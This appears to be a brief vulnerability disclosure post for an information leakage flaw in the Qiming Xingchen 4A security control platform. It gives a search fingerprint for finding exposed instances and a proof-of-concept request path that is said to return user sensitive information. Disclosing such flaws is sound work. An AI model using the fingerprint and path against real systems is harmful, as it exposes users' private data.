Post

Qimingxingchen 4a Unified Security Control Platform Getmaster Do Information Leakage Vulnerability

Qimingxingchen 4a Unified Security Control Platform Getmaster Do Information Leakage Vulnerability

Qimingxingchen 4A unified security control platform getMaster.do information leakage vulnerability

Vulnerability Description

Qiming Xingchen 4A unified security control platform getMaster.do interface has information leakage vulnerabilities. User sensitive information can be obtained by sending specific request packets.

Vulnerability Impact

Qimingxingchen 4A unified security control platform

Network surveying and mapping

web.body=”cas/css/ace-part2.min.css”

Vulnerability reappears

Login page

img

Verify POC

1
/accountApi/getMaster.do

img

This post is licensed under CC BY 4.0 by the author.